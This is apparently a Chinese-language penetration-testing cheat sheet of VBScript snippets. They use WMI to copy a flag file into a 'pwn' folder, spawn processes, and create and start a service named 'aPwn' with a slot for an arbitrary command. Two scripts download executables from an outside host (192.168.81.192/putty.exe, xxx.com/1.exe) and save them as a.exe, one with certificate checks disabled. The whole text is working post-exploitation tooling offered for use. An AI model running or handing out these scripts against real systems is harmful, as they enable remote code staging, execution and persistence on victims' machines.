vbs调用WMI接口复制文件:
Set objWMIService = GetObject("winmgmts://./root/CIMV2")
Set colFiles = objWMIService.ExecQuery("SELECT * FROM CIM_DataFIle Where Name='c:\\target\\Flag.dat'")
For Each objFile In ColFiles
objFile.Copy("C:\pwn\Flag.dat")
Next
创建进程:
Dim objWMIService, objProcess, strShell, objProgram
set objWMIService = getobject("winmgmts://./root/cimv2")
Set objProcess = objWMIService.Get("Win32_Process")
Set objProgram = objProcess.Methods_("Create").InParameters.SpawnInstance_
objProgram.CommandLine = "Calc.exe"
objWMIService.ExecMethod "Win32_Process", "Create", objProgram
创建服务:
Const OWN_PROCESS = 16
Const NOT_INTERACTIVE = False
Const NORMAL_ERROR_CONTROL = 2
Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
Set objService = objWMIService.Get("Win32_BaseService")
errReturn = objService.Create("aPwn" ,"aPWN service" ,"这里修改成要执行的命令", OWN_PROCESS, NORMAL_ERROR_CONTROL, "Manual", NOT_INTERACTIVE, "NT AUTHORITY\LocalService", "" )
If errReturn = 23 Then
Set ServiceSet = GetObject("winmgmts:").ExecQuery("select * from Win32_Service where Name='aPwn'")
for each Service in ServiceSet
Service.StartService()
next
End If
vbs下载文件脚本
Const adTypeBinary = 1
Const adSaveCreateOverWrite = 2
Dim http,ado
Set http = CreateObject("Msxml2.XMLHTTP")
http.open "GET","http://192.168.81.192/putty.exe",False
http.send
Set ado = createobject("Adodb.Stream")
ado.Type = adTypeBinary
ado.Open
ado.Write http.responseBody
ado.SaveToFile "c:\download\a.exe"
ado.Close
下面这个支持https下载:
Const adTypeBinary = 1
Const adSaveCreateOverWrite = 2
Dim http,ado
Set http = CreateObject("Msxml2.ServerXMLHTTP.6.0")
http.SetOption 2, 13056
http.open "GET","https://xxx.com/1.exe",False
http.send
Set ado = createobject("Adodb.Stream")
ado.Type = adTypeBinary
ado.Open
ado.Write http.responseBody
ado.SaveToFile "c:\download\a.exe"
ado.Close